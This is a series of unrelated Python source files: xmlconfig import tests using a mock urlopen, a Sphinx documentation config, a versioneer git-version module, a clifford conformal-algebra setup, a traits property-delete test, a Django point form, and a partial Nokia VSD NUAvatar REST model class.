sys.path.append(sys.path.insert(0,"../src"))

def urlopen(*args, **kwargs):
    # Only parse one arg: the url
    return Urls[args[0]]

# Provide a simple hashtable to contain the content of the urls and 
# provide a mock object similar to what will be returned from the
# real urlopen() function calls
from io import StringIO
from time import time
import re
from nose.tools import with_setup
class MockUrlContent(StringIO):
    def __init__(self, content):
        super(MockUrlContent, self).__init__(content)
        self.headers = {
            'last-modified': time()
        }

    def close(self):
        pass
    
scheme_re = re.compile(r'file:(/+)?')
class MockUrlCache(dict):
    def __setitem__(self, name, content):
        super(MockUrlCache, self).__setitem__(name, MockUrlContent(content))

    def __getitem__(self, name):
        if name in self:
            return super(MockUrlCache, self).__getitem__(name)
        # Strip off 'file:[///]' from url
        elif name.startswith('file:'):
            try:
                name= scheme_re.sub('', name)
                return super(MockUrlCache, self).__getitem__(name)
            except:
                # Fall through
                pass
        # urlopen raises ValueError if unable to load content (not KeyError)
        raise ValueError("{0}: Cannot find file content".format(name))

Urls = MockUrlCache()

def clear_configs():
    pass

@with_setup(clear_configs)
def testImportContent():
    "Cannot import content from a file"
    from xmlconfig import getConfig
    Urls.clear()
    Urls["file:file.txt"] = "Content embedded in a file"
    Urls["config.xml"] = \
    u"""<?xml version="1.0" encoding="utf-8"?>
    <config>
        <constants>
            <string key="import" src="file:file.txt"/>
        </constants>
    </config>
    """
    conf=getConfig()
    conf.load("config.xml")
    assert conf.get("import") == "Content embedded in a file"

@with_setup(clear_configs)
def testImportConfig():
    "Cannot import another config file"
    from xmlconfig import getConfig
    Urls.clear()
    Urls["config2.xml"] = \
    """<?xml version="1.0"?>
    <config>
        <constants>
            <string key="key22">This was imported from config2.xml</string>
        </constants>
    </config>
    """
    Urls["config.xml"] = \
    u"""<?xml version="1.0" encoding="utf-8"?>
    <config>
        <constants namespace="import" src="file:config2.xml"/>
        <constants>
            <string key="imported">%(import:key22)</string>
        </constants>
    </config>
    """
    conf=getConfig()
    conf.load("config.xml")
    assert conf.get("imported") == "This was imported from config2.xml"

@with_setup(clear_configs)
def testCircularImport():
    "Property detect circluar importing"
    from xmlconfig import getConfig
    Urls.clear()
    Urls["config2.xml"] = \
    """<?xml version="1.0"?>
    <config>
        <constants namespace="circular" src="file:config.xml"/>        
        <constants>
            <string key="key22">This was imported from config2.xml</string>        
            <string key="foreign">
                Namespace changed in %(circular:key4.import)
            </string>
        </constants>
    </config>
    """
    Urls["config.xml"] = \
    """<?xml version="1.0"?>
    <config>
        <constants namespace="import" src="file:config2.xml"/>
        <constants>
            <section key="key4">
                <string key="key5">value2</string>
                <string key="import">%(import:key22)</string>
            </section>
        </constants>
    </config>
    """
    conf=getConfig()
    conf.load("config.xml")
    assert conf.get("import:foreign") == \
        "Namespace changed in This was imported from config2.xml"

@with_setup(clear_configs)
def testRelativeImport():
    """Transfer leading absolute or relative path to the location of 
    documents imported"""
    from xmlconfig import getConfig
    Urls["../config/config2.xml"] = \
    """<?xml version="1.0"?>
    <config>
        <constants>
            <string key="key22">This was imported from config2.xml</string>
        </constants>
    </config>
    """
    Urls["../config/config.xml"] = \
    """<?xml version="1.0" encoding="utf-8"?>
    <config>
        <constants namespace="import" src="file:config2.xml"/>
        <constants>
            <string key="imported">%(import:key22)</string>
        </constants>
    </config>
    """
    conf=getConfig()
    conf.load("../config/config.xml")
    assert conf.get("imported") == "This was imported from config2.xml"
    

# -*- coding: utf-8 -*-
#
# complexity documentation build configuration file, created by
# sphinx-quickstart on Tue Jul  9 22:26:36 2013.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.

import sys, os

# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))

cwd = os.getcwd()
parent = os.path.dirname(cwd)
sys.path.append(parent)

import organigrammi

# -- General configuration -----------------------------------------------------

# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'

# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode']

# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']

# The suffix of source filenames.
source_suffix = '.rst'

# The encoding of source files.
#source_encoding = 'utf-8-sig'

# The master toctree document.
master_doc = 'index'

# General information about the project.
project = u'openpa-organigrammi'
copyright = u'2014, Simone Dalla'

# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = organigrammi.__version__
# The full version, including alpha/beta/rc tags.
release = organigrammi.__version__

# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None

# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'

# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']

# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None

# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True

# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True

# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False

# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'

# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []

# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False


# -- Options for HTML output ---------------------------------------------------

# The theme to use for HTML and HTML Help pages.  See the documentation for
# a list of builtin themes.
html_theme = 'default'

# Theme options are theme-specific and customize the look and feel of a theme
# further.  For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}

# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []

# The name for this set of Sphinx documents.  If None, it defaults to
# "<project> v<release> documentation".
#html_title = None

# A shorter title for the navigation bar.  Default is the same as html_title.
#html_short_title = None

# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None

# The name of an image file (within the static path) to use as favicon of the
# docs.  This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None

# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']

# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'

# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True

# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}

# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}

# If false, no module index is generated.
#html_domain_indices = True

# If false, no index is generated.
#html_use_index = True

# If true, the index is split into individual pages for each letter.
#html_split_index = False

# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True

# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True

# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True

# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it.  The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''

# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None

# Output file base name for HTML help builder.
htmlhelp_basename = 'openpa-organigrammidoc'


# -- Options for LaTeX output --------------------------------------------------

latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',

# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',

# Additional stuff for the LaTeX preamble.
#'preamble': '',
}

# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
  ('index', 'openpa-organigrammi.tex', u'openpa-organigrammi Documentation',
   u'Simone Dalla', 'manual'),
]

# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None

# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False

# If true, show page references after internal links.
#latex_show_pagerefs = False

# If true, show URL addresses after external links.
#latex_show_urls = False

# Documents to append as an appendix to all manuals.
#latex_appendices = []

# If false, no module index is generated.
#latex_domain_indices = True


# -- Options for manual page output --------------------------------------------

# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
    ('index', 'openpa-organigrammi', u'openpa-organigrammi Documentation',
     [u'Simone Dalla'], 1)
]

# If true, show URL addresses after external links.
#man_show_urls = False


# -- Options for Texinfo output ------------------------------------------------

# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
#  dir menu entry, description, category)
texinfo_documents = [
  ('index', 'openpa-organigrammi', u'openpa-organigrammi Documentation',
   u'Simone Dalla', 'openpa-organigrammi', 'One line description of project.',
   'Miscellaneous'),
]

# Documents to append as an appendix to all manuals.
#texinfo_appendices = []

# If false, no module index is generated.
#texinfo_domain_indices = True

# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'

# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False

# This file helps to compute a version number in source trees obtained from
# git-archive tarball (such as those provided by githubs download-from-tag
# feature). Distribution tarballs (built by setup.py sdist) and build
# directories (produced by setup.py build) will contain a much shorter file
# that just contains the computed version number.

# This file is released into the public domain. Generated by
# versioneer-0.19 (https://github.com/python-versioneer/python-versioneer)

"""Git implementation of _version.py."""

import errno
import os
import re
import subprocess
import sys


def get_keywords():
    """Get the keywords needed to look up the version information."""
    # these strings will be replaced by git during git-archive.
    # setup.py/versioneer.py will grep for the variable names, so they must
    # each be defined on a line of their own. _version.py will just call
    # get_keywords().
    git_refnames = "$Format:%d$"
    git_full = "$Format:%H$"
    git_date = "$Format:%ci$"
    keywords = {"refnames": git_refnames, "full": git_full, "date": git_date}
    return keywords


class VersioneerConfig:
    """Container for Versioneer configuration parameters."""


def get_config():
    """Create, populate and return the VersioneerConfig() object."""
    # these strings are filled in when 'setup.py versioneer' creates
    # _version.py
    cfg = VersioneerConfig()
    cfg.VCS = "git"
    cfg.style = "pep440"
    cfg.tag_prefix = "v"
    cfg.parentdir_prefix = ""
    cfg.versionfile_source = "jxl2txt/_version.py"
    cfg.verbose = False
    return cfg


class NotThisMethod(Exception):
    """Exception raised if a method is not valid for the current scenario."""


LONG_VERSION_PY = {}
HANDLERS = {}


def register_vcs_handler(vcs, method):  # decorator
    """Create decorator to mark a method as the handler of a VCS."""
    def decorate(f):
        """Store f in HANDLERS[vcs][method]."""
        if vcs not in HANDLERS:
            HANDLERS[vcs] = {}
        HANDLERS[vcs][method] = f
        return f
    return decorate


def run_command(commands, args, cwd=None, verbose=False, hide_stderr=False,
                env=None):
    """Call the given command(s)."""
    assert isinstance(commands, list)
    p = None
    for c in commands:
        try:
            dispcmd = str([c] + args)
            # remember shell=False, so use git.cmd on windows, not just git
            p = subprocess.Popen([c] + args, cwd=cwd, env=env,
                                 stdout=subprocess.PIPE,
                                 stderr=(subprocess.PIPE if hide_stderr
                                         else None))
            break
        except EnvironmentError:
            e = sys.exc_info()[1]
            if e.errno == errno.ENOENT:
                continue
            if verbose:
                print("unable to run %s" % dispcmd)
                print(e)
            return None, None
    else:
        if verbose:
            print("unable to find command, tried %s" % (commands,))
        return None, None
    stdout = p.communicate()[0].strip().decode()
    if p.returncode != 0:
        if verbose:
            print("unable to run %s (error)" % dispcmd)
            print("stdout was %s" % stdout)
        return None, p.returncode
    return stdout, p.returncode


def versions_from_parentdir(parentdir_prefix, root, verbose):
    """Try to determine the version from the parent directory name.

    Source tarballs conventionally unpack into a directory that includes both
    the project name and a version string. We will also support searching up
    two directory levels for an appropriately named parent directory
    """
    rootdirs = []

    for i in range(3):
        dirname = os.path.basename(root)
        if dirname.startswith(parentdir_prefix):
            return {"version": dirname[len(parentdir_prefix):],
                    "full-revisionid": None,
                    "dirty": False, "error": None, "date": None}
        else:
            rootdirs.append(root)
            root = os.path.dirname(root)  # up a level

    if verbose:
        print("Tried directories %s but none started with prefix %s" %
              (str(rootdirs), parentdir_prefix))
    raise NotThisMethod("rootdir doesn't start with parentdir_prefix")


@register_vcs_handler("git", "get_keywords")
def git_get_keywords(versionfile_abs):
    """Extract version information from the given file."""
    # the code embedded in _version.py can just fetch the value of these
    # keywords. When used from setup.py, we don't want to import _version.py,
    # so we do it with a regexp instead. This function is not used from
    # _version.py.
    keywords = {}
    try:
        f = open(versionfile_abs, "r")
        for line in f.readlines():
            if line.strip().startswith("git_refnames ="):
                mo = re.search(r'=\s*"(.*)"', line)
                if mo:
                    keywords["refnames"] = mo.group(1)
            if line.strip().startswith("git_full ="):
                mo = re.search(r'=\s*"(.*)"', line)
                if mo:
                    keywords["full"] = mo.group(1)
            if line.strip().startswith("git_date ="):
                mo = re.search(r'=\s*"(.*)"', line)
                if mo:
                    keywords["date"] = mo.group(1)
        f.close()
    except EnvironmentError:
        pass
    return keywords


@register_vcs_handler("git", "keywords")
def git_versions_from_keywords(keywords, tag_prefix, verbose):
    """Get version information from git keywords."""
    if not keywords:
        raise NotThisMethod("no keywords at all, weird")
    date = keywords.get("date")
    if date is not None:
        # Use only the last line.  Previous lines may contain GPG signature
        # information.
        date = date.splitlines()[-1]

        # git-2.2.0 added "%cI", which expands to an ISO-8601 -compliant
        # datestamp. However we prefer "%ci" (which expands to an "ISO-8601
        # -like" string, which we must then edit to make compliant), because
        # it's been around since git-1.5.3, and it's too difficult to
        # discover which version we're using, or to work around using an
        # older one.
        date = date.strip().replace(" ", "T", 1).replace(" ", "", 1)
    refnames = keywords["refnames"].strip()
    if refnames.startswith("$Format"):
        if verbose:
            print("keywords are unexpanded, not using")
        raise NotThisMethod("unexpanded keywords, not a git-archive tarball")
    refs = set([r.strip() for r in refnames.strip("()").split(",")])
    # starting in git-1.8.3, tags are listed as "tag: foo-1.0" instead of
    # just "foo-1.0". If we see a "tag: " prefix, prefer those.
    TAG = "tag: "
    tags = set([r[len(TAG):] for r in refs if r.startswith(TAG)])
    if not tags:
        # Either we're using git < 1.8.3, or there really are no tags. We use
        # a heuristic: assume all version tags have a digit. The old git %d
        # expansion behaves like git log --decorate=short and strips out the
        # refs/heads/ and refs/tags/ prefixes that would let us distinguish
        # between branches and tags. By ignoring refnames without digits, we
        # filter out many common branch names like "release" and
        # "stabilization", as well as "HEAD" and "master".
        tags = set([r for r in refs if re.search(r'\d', r)])
        if verbose:
            print("discarding '%s', no digits" % ",".join(refs - tags))
    if verbose:
        print("likely tags: %s" % ",".join(sorted(tags)))
    for ref in sorted(tags):
        # sorting will prefer e.g. "2.0" over "2.0rc1"
        if ref.startswith(tag_prefix):
            r = ref[len(tag_prefix):]
            if verbose:
                print("picking %s" % r)
            return {"version": r,
                    "full-revisionid": keywords["full"].strip(),
                    "dirty": False, "error": None,
                    "date": date}
    # no suitable tags, so version is "0+unknown", but full hex is still there
    if verbose:
        print("no suitable tags, using unknown + full revision id")
    return {"version": "0+unknown",
            "full-revisionid": keywords["full"].strip(),
            "dirty": False, "error": "no suitable tags", "date": None}


@register_vcs_handler("git", "pieces_from_vcs")
def git_pieces_from_vcs(tag_prefix, root, verbose, run_command=run_command):
    """Get version from 'git describe' in the root of the source tree.

    This only gets called if the git-archive 'subst' keywords were *not*
    expanded, and _version.py hasn't already been rewritten with a short
    version string, meaning we're inside a checked out source tree.
    """
    GITS = ["git"]
    if sys.platform == "win32":
        GITS = ["git.cmd", "git.exe"]

    out, rc = run_command(GITS, ["rev-parse", "--git-dir"], cwd=root,
                          hide_stderr=True)
    if rc != 0:
        if verbose:
            print("Directory %s not under git control" % root)
        raise NotThisMethod("'git rev-parse --git-dir' returned error")

    # if there is a tag matching tag_prefix, this yields TAG-NUM-gHEX[-dirty]
    # if there isn't one, this yields HEX[-dirty] (no NUM)
    describe_out, rc = run_command(GITS, ["describe", "--tags", "--dirty",
                                          "--always", "--long",
                                          "--match", "%s*" % tag_prefix],
                                   cwd=root)
    # --long was added in git-1.5.5
    if describe_out is None:
        raise NotThisMethod("'git describe' failed")
    describe_out = describe_out.strip()
    full_out, rc = run_command(GITS, ["rev-parse", "HEAD"], cwd=root)
    if full_out is None:
        raise NotThisMethod("'git rev-parse' failed")
    full_out = full_out.strip()

    pieces = {}
    pieces["long"] = full_out
    pieces["short"] = full_out[:7]  # maybe improved later
    pieces["error"] = None

    # parse describe_out. It will be like TAG-NUM-gHEX[-dirty] or HEX[-dirty]
    # TAG might have hyphens.
    git_describe = describe_out

    # look for -dirty suffix
    dirty = git_describe.endswith("-dirty")
    pieces["dirty"] = dirty
    if dirty:
        git_describe = git_describe[:git_describe.rindex("-dirty")]

    # now we have TAG-NUM-gHEX or HEX

    if "-" in git_describe:
        # TAG-NUM-gHEX
        mo = re.search(r'^(.+)-(\d+)-g([0-9a-f]+)$', git_describe)
        if not mo:
            # unparseable. Maybe git-describe is misbehaving?
            pieces["error"] = ("unable to parse git-describe output: '%s'"
                               % describe_out)
            return pieces

        # tag
        full_tag = mo.group(1)
        if not full_tag.startswith(tag_prefix):
            if verbose:
                fmt = "tag '%s' doesn't start with prefix '%s'"
                print(fmt % (full_tag, tag_prefix))
            pieces["error"] = ("tag '%s' doesn't start with prefix '%s'"
                               % (full_tag, tag_prefix))
            return pieces
        pieces["closest-tag"] = full_tag[len(tag_prefix):]

        # distance: number of commits since tag
        pieces["distance"] = int(mo.group(2))

        # commit: short hex revision ID
        pieces["short"] = mo.group(3)

    else:
        # HEX: no tags
        pieces["closest-tag"] = None
        count_out, rc = run_command(GITS, ["rev-list", "HEAD", "--count"],
                                    cwd=root)
        pieces["distance"] = int(count_out)  # total number of commits

    # commit date: see ISO-8601 comment in git_versions_from_keywords()
    date = run_command(GITS, ["show", "-s", "--format=%ci", "HEAD"],
                       cwd=root)[0].strip()
    # Use only the last line.  Previous lines may contain GPG signature
    # information.
    date = date.splitlines()[-1]
    pieces["date"] = date.strip().replace(" ", "T", 1).replace(" ", "", 1)

    return pieces


def plus_or_dot(pieces):
    """Return a + if we don't already have one, else return a ."""
    if "+" in pieces.get("closest-tag", ""):
        return "."
    return "+"


def render_pep440(pieces):
    """Build up version string, with post-release "local version identifier".

    Our goal: TAG[+DISTANCE.gHEX[.dirty]] . Note that if you
    get a tagged build and then dirty it, you'll get TAG+0.gHEX.dirty

    Exceptions:
    1: no tags. git_describe was just HEX. 0+untagged.DISTANCE.gHEX[.dirty]
    """
    if pieces["closest-tag"]:
        rendered = pieces["closest-tag"]
        if pieces["distance"] or pieces["dirty"]:
            rendered += plus_or_dot(pieces)
            rendered += "%d.g%s" % (pieces["distance"], pieces["short"])
            if pieces["dirty"]:
                rendered += ".dirty"
    else:
        # exception #1
        rendered = "0+untagged.%d.g%s" % (pieces["distance"],
                                          pieces["short"])
        if pieces["dirty"]:
            rendered += ".dirty"
    return rendered


def render_pep440_pre(pieces):
    """TAG[.post0.devDISTANCE] -- No -dirty.

    Exceptions:
    1: no tags. 0.post0.devDISTANCE
    """
    if pieces["closest-tag"]:
        rendered = pieces["closest-tag"]
        if pieces["distance"]:
            rendered += ".post0.dev%d" % pieces["distance"]
    else:
        # exception #1
        rendered = "0.post0.dev%d" % pieces["distance"]
    return rendered


def render_pep440_post(pieces):
    """TAG[.postDISTANCE[.dev0]+gHEX] .

    The ".dev0" means dirty. Note that .dev0 sorts backwards
    (a dirty tree will appear "older" than the corresponding clean one),
    but you shouldn't be releasing software with -dirty anyways.

    Exceptions:
    1: no tags. 0.postDISTANCE[.dev0]
    """
    if pieces["closest-tag"]:
        rendered = pieces["closest-tag"]
        if pieces["distance"] or pieces["dirty"]:
            rendered += ".post%d" % pieces["distance"]
            if pieces["dirty"]:
                rendered += ".dev0"
            rendered += plus_or_dot(pieces)
            rendered += "g%s" % pieces["short"]
    else:
        # exception #1
        rendered = "0.post%d" % pieces["distance"]
        if pieces["dirty"]:
            rendered += ".dev0"
        rendered += "+g%s" % pieces["short"]
    return rendered


def render_pep440_old(pieces):
    """TAG[.postDISTANCE[.dev0]] .

    The ".dev0" means dirty.

    Exceptions:
    1: no tags. 0.postDISTANCE[.dev0]
    """
    if pieces["closest-tag"]:
        rendered = pieces["closest-tag"]
        if pieces["distance"] or pieces["dirty"]:
            rendered += ".post%d" % pieces["distance"]
            if pieces["dirty"]:
                rendered += ".dev0"
    else:
        # exception #1
        rendered = "0.post%d" % pieces["distance"]
        if pieces["dirty"]:
            rendered += ".dev0"
    return rendered


def render_git_describe(pieces):
    """TAG[-DISTANCE-gHEX][-dirty].

    Like 'git describe --tags --dirty --always'.

    Exceptions:
    1: no tags. HEX[-dirty]  (note: no 'g' prefix)
    """
    if pieces["closest-tag"]:
        rendered = pieces["closest-tag"]
        if pieces["distance"]:
            rendered += "-%d-g%s" % (pieces["distance"], pieces["short"])
    else:
        # exception #1
        rendered = pieces["short"]
    if pieces["dirty"]:
        rendered += "-dirty"
    return rendered


def render_git_describe_long(pieces):
    """TAG-DISTANCE-gHEX[-dirty].

    Like 'git describe --tags --dirty --always -long'.
    The distance/hash is unconditional.

    Exceptions:
    1: no tags. HEX[-dirty]  (note: no 'g' prefix)
    """
    if pieces["closest-tag"]:
        rendered = pieces["closest-tag"]
        rendered += "-%d-g%s" % (pieces["distance"], pieces["short"])
    else:
        # exception #1
        rendered = pieces["short"]
    if pieces["dirty"]:
        rendered += "-dirty"
    return rendered


def render(pieces, style):
    """Render the given version pieces into the requested style."""
    if pieces["error"]:
        return {"version": "unknown",
                "full-revisionid": pieces.get("long"),
                "dirty": None,
                "error": pieces["error"],
                "date": None}

    if not style or style == "default":
        style = "pep440"  # the default

    if style == "pep440":
        rendered = render_pep440(pieces)
    elif style == "pep440-pre":
        rendered = render_pep440_pre(pieces)
    elif style == "pep440-post":
        rendered = render_pep440_post(pieces)
    elif style == "pep440-old":
        rendered = render_pep440_old(pieces)
    elif style == "git-describe":
        rendered = render_git_describe(pieces)
    elif style == "git-describe-long":
        rendered = render_git_describe_long(pieces)
    else:
        raise ValueError("unknown style '%s'" % style)

    return {"version": rendered, "full-revisionid": pieces["long"],
            "dirty": pieces["dirty"], "error": None,
            "date": pieces.get("date")}


def get_versions():
    """Get version information or return default if unable to do so."""
    # I am in _version.py, which lives at ROOT/VERSIONFILE_SOURCE. If we have
    # __file__, we can work backwards from there to the root. Some
    # py2exe/bbfreeze/non-CPython implementations don't do __file__, in which
    # case we can only use expanded keywords.

    cfg = get_config()
    verbose = cfg.verbose

    try:
        return git_versions_from_keywords(get_keywords(), cfg.tag_prefix,
                                          verbose)
    except NotThisMethod:
        pass

    try:
        root = os.path.realpath(__file__)
        # versionfile_source is the relative path from the top of the source
        # tree (where the .git directory might live) to this file. Invert
        # this to find the root from __file__.
        for i in cfg.versionfile_source.split('/'):
            root = os.path.dirname(root)
    except NameError:
        return {"version": "0+unknown", "full-revisionid": None,
                "dirty": None,
                "error": "unable to find root of source tree",
                "date": None}

    try:
        pieces = git_pieces_from_vcs(cfg.tag_prefix, root, verbose)
        return render(pieces, cfg.style)
    except NotThisMethod:
        pass

    try:
        if cfg.parentdir_prefix:
            return versions_from_parentdir(cfg.parentdir_prefix, root, verbose)
    except NotThisMethod:
        pass

    return {"version": "0+unknown", "full-revisionid": None,
            "dirty": None,
            "error": "unable to compute version", "date": None}

from . import Cl, conformalize
layout_orig, blades_orig = Cl(3)
layout, blades, stuff = conformalize(layout_orig)


locals().update(blades)
locals().update(stuff)

# for shorter reprs
layout.__name__ = 'layout'
layout.__module__ = __name__

"""
Unit tests to ensure that we can call reset_traits/delete on a
property trait (regression tests for Github issue #67).

"""

from traits import _py2to3
from traits.api import Any, HasTraits, Int, Property, TraitError
from traits.testing.unittest_tools import unittest


class E(HasTraits):

    a = Property(Any)

    b = Property(Int)


class TestPropertyDelete(unittest.TestCase):

    def test_property_delete(self):
        e = E()
        with self.assertRaises(TraitError):
            del e.a
        with self.assertRaises(TraitError):
            del e.b

    def test_property_reset_traits(self):
        e = E()
        unresetable = e.reset_traits()
        _py2to3.assertCountEqual(self, unresetable, ['a', 'b'])

from django import forms
from ncdjango.interfaces.arcgis.form_fields import SrField


class PointForm(forms.Form):
    x = forms.FloatField()
    y = forms.FloatField()
    projection = SrField()
# -*- coding: utf-8 -*-
#
# Copyright (c) 2015, Alcatel-Lucent Inc, 2017 Nokia
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#     * Redistributions of source code must retain the above copyright
#       notice, this list of conditions and the following disclaimer.
#     * Redistributions in binary form must reproduce the above copyright
#       notice, this list of conditions and the following disclaimer in the
#       documentation and/or other materials provided with the distribution.
#     * Neither the name of the copyright holder nor the names of its contributors
#       may be used to endorse or promote products derived from this software without
#       specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.




from .fetchers import NUPermissionsFetcher


from .fetchers import NUMetadatasFetcher


from .fetchers import NUGlobalMetadatasFetcher

from bambou import NURESTObject


class NUAvatar(NURESTObject):
    """ Represents a Avatar in the VSD

        Notes:
            Avatar
    """

    __rest_name__ = "avatar"
    __resource_name__ = "avatars"

    
    ## Constants
    
    CONST_ENTITY_SCOPE_GLOBAL = "GLOBAL"
    
    CONST_ENTITY_SCOPE_ENTERPRISE = "ENTERPRISE"
    
    

    def __init__(self, **kwargs):
        """ Initializes a Avatar instance

            Notes:
                You can specify all parameters while calling this methods.
                A special argument named `data` will enable you to load the
                object from a Python dictionary

            Examples:
                >>> avatar = NUAvatar(id=u'xxxx-xxx-xxx-xxx', name=u'Avatar')
                >>> avatar = NUAvatar(data=my_dict)
        """

        super(NUAvatar, self).__init__()

        # Read/Write Attributes
        
        self._last_updated_by = None
        self._last_updated_date = None
        self._embedded_metadata = None
        self._entity_scope = None
        self._creation_date = None
        self._owner = None
        self._external_id = None
        self._type = None
        
        self.expose_attribute(local_name="last_updated_by", remote_name="lastUpdatedBy", attribute_type=str, is_required=False, is_unique=False)
        self.expose_attribute(local_name="last_updated_date", remote_name="lastUpdatedDate", attribute_type=str, is_required=False, is_unique=False)
        self.expose_attribute(local_name="embedded_metadata", remote_name="embeddedMetadata", attribute_type=list, is_required=False, is_unique=False)
        self.expose_attribute(local_name="entity_scope", remote_name="entityScope", attribute_type=str, is_required=False, is_unique=False, choices=[u'ENTERPRISE', u'GLOBAL'])
        self.expose_attribute(local_name="creation_date", remote_name="creationDate", attribute_type=str, is_required=False, is_unique=False)
        self.expose_attribute(local_name="owner", remote_name="owner", attribute_type=str, is_required=False, is_unique=False)
        self.expose_attribute(local_name="external_id", remote_name="externalID", attribute_type=str, is_required=False, is_unique=True)
        self.expose_attribute(local_name="type", remote_name="type", attribute_type=str, is_required=False, is_unique=False)
        

        # Fetchers
        
        
        self.permissions = NUPermissionsFetcher.fetcher_with_object(parent_object=self, relationship="child")
        
        
        self.metadatas = NUMetadatasFetcher.fetcher_with_object(parent_object=self, relationship="child")
        
        
        self.global_metadatas = NUGlobalMetadatasFetcher.fetcher_with_object(parent_object=self, relationship="child")
        

        self._compute_args(**kwargs)

    # Properties
    
    @property
    def last_updated_by(self):
        """ Get last_updated_by value.

            Notes:
                ID of the user who last updated the object.

                
                This attribute is named `lastUpdatedBy` in VSD API.
                
        """
        return self._last_updated_by

    @last_updated_by.setter
    def last_updated_by(self, value):
        """ Set last_updated_by value.

            Notes:
                ID of the user who last updated the object.

                
                This attribute is named `lastUpdatedBy` in VSD API.
                
        """
        self._last_updated_by = value

    
    @property
    def last_updated_date(self):
        """ Get last_updated_date value.

            Notes:
                Time stamp when this object was last updated.

                
                This attribute is named `lastUpdatedDate` in VSD API.
                
        """
        return self._last_updated_date

    @last_updated_date.setter
    def last_updated_date(self, value):
        """ Set last_updated_date value.

            Notes:
                Time stamp when this object was last updated.

                
                This attribute is named `lastUpdatedDate` in VSD API.
                
        """
        self._last_updated_date = value

    
    @property
    def embedded_metadata(self):
        """ Get embedded_metadata value.

            Notes:
                Metadata objects associated with this entity. This will contain a list of Metadata objects if the API request is made using the special flag to enable the embedded Metadata feature. Only a maximum of Metadata objects is returned based on the value set in the system configuration.

                
                This attribute is named `embeddedMetadata` in VSD API.
                
        """
        return self._embedded_metadata

    @embedded_metadata.setter
    def embedded_metadata(self, value):
        """ Set embedded_metadata value.

            Notes:
                Metadata objects associated with this entity. This will contain a list of Metadata objects if the API request is made using the special flag to enable the embedded Metadata feature. Only a maximum of Metadata objects is returned based on the value set in the system configuration.

                
                This attribute is named `embeddedMetadata` in VSD API.
                
        """
        self._embedded_metadata = value

    
    @property
    def entity_scope(self):
        """ Get entity_scope value.

            Notes:
